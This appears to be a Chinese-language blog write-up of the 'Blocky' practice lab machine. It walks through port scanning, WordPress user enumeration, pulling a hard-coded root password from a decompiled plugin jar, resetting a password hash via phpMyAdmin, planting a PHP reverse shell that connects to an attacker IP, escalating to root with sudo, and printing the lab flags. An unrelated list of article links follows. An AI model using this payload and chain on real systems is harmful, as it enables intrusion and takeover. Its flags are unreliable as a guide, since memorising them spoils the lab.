当前位置: 首页 > news >正文

[Meachines] [Easy] Blocky Jar包反编译

news 来源:原创 2024/9/20 0:13:42

信息收集

IP AddressOpening Ports
10.10.10.37TCP:21,22,80,25565

$ nmap -p- 10.10.10.37 --min-rate 1000 -sC -sV

PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)

HTTPD

image.png

# echo '10.10.10.37 blocky.htb'>>/etc/hosts

$ wpscan --url http://blocky.htb/ --enumerate u

username:notch

$ dirb http://blocky.htb

image-1.png

http://blocky.htb/plugins/

image-2.png

http://blocky.htb/phpmyadmin/

image-3.png

Jar包反编译

$ wget http://blocky.htb/plugins/files/BlockyCore.jar

$ binwalk BlockyCore.jar

image-4.png

$ foremost BlockyCore.jar

$ cd ./output/zip

$ unzip 00000000.zip

$ cd ./com/myfirstplugin

$ javap -c BlockyCore.class

image-5.png

username:root password:8YsqfCTnvxAUeduzjNSXe22

www-data 权限

phpAdmin登录,更新notch密码

image-7.png

https://www.useotools.com/ru/wordpress-password-hash-generator

$P$BNG7MVQRrgfTW4aREpCCA7Bv80pHmf/

image-8.png

$ip = '10.10.16.6';
$port = 10032;
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);

image-9.png

$ curl http://blocky.htb/

image-10.png

$ su notch

Password: 8YsqfCTnvxAUeduzjNSXe22

image-11.png

User.txt

23da8f7548a2c1df972caa7fc6ca3b9d

权限提升

$ sudo -l

$ sudo /bin/bash

image-12.png

Root.txt

8e66e7402571816ee90419d1a6eca642

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 【HarmonyOS】应用推送使用个推SDK如何实现?
  • MySQL面试篇章—MySQL锁机制
  • 【C++ —— 认识哈希和unordered_set、unordered_map的介绍及模拟】
  • 【学习笔记】Redis学习笔记——第17章 集群
  • Mojo简介
  • 打卡第22天------回溯算法
  • 深度学习系列70:模型部署torchserve
  • python 裁剪图片
  • 《梁宁产品思维30讲》是一门深入剖析产品思维、产品认知框架的课程
  • Windows11和Win10如何彻底永久关闭Windows defender
  • MySQL可重复读的隔离机制下是否彻底解决了幻读?
  • 云服务部署项目(Spring + Vue)
  • vue-router小结
  • Python3网络爬虫开发实战(1)爬虫基础
  • Vue.js 与 Ajax(vue-resource)的集成应用
  • 【5+】跨webview多页面 触发事件(二)
  • canvas 高仿 Apple Watch 表盘
  • ES10 特性的完整指南
  • ES6核心特性
  • JavaScript异步流程控制的前世今生
  • node学习系列之简单文件上传
  • Objective-C 中关联引用的概念
  • ReactNative开发常用的三方模块
  • spring + angular 实现导出excel
  • swift基础之_对象 实例方法 对象方法。
  • web标准化(下)
  • 对象引论
  • 分享一个自己写的基于canvas的原生js图片爆炸插件
  • 分享自己折腾多时的一套 vue 组件 --we-vue
  • 解析 Webpack中import、require、按需加载的执行过程
  • 如何优雅地使用 Sublime Text
  • 使用阿里云发布分布式网站,开发时候应该注意什么?
  • 说说动画卡顿的解决方案
  • 微信小程序填坑清单
  • 限制Java线程池运行线程以及等待线程数量的策略
  • ​ArcGIS Pro 如何批量删除字段
  • ​iOS安全加固方法及实现
  • ​ssh免密码登录设置及问题总结
  • ​虚拟化系列介绍(十)
  • # 利刃出鞘_Tomcat 核心原理解析(八)-- Tomcat 集群
  • ### RabbitMQ五种工作模式:
  • #每天一道面试题# 什么是MySQL的回表查询
  • (4)事件处理——(6)给.ready()回调函数传递一个参数(Passing an argument to the .ready() callback)...
  • (done) ROC曲线 和 AUC值 分别是什么?
  • (搬运以学习)flask 上下文的实现
  • (二) 初入MySQL 【数据库管理】
  • (二)Pytorch快速搭建神经网络模型实现气温预测回归(代码+详细注解)
  • (附源码)计算机毕业设计SSM保险客户管理系统
  • (附源码)计算机毕业设计高校学生选课系统
  • (力扣)循环队列的实现与详解(C语言)
  • (学习日记)2024.04.10:UCOSIII第三十八节:事件实验
  • (一)基于IDEA的JAVA基础10
  • (转) Android中ViewStub组件使用
  • .JPG图片,各种压缩率下的文件尺寸
  • .NET WPF 抖动动画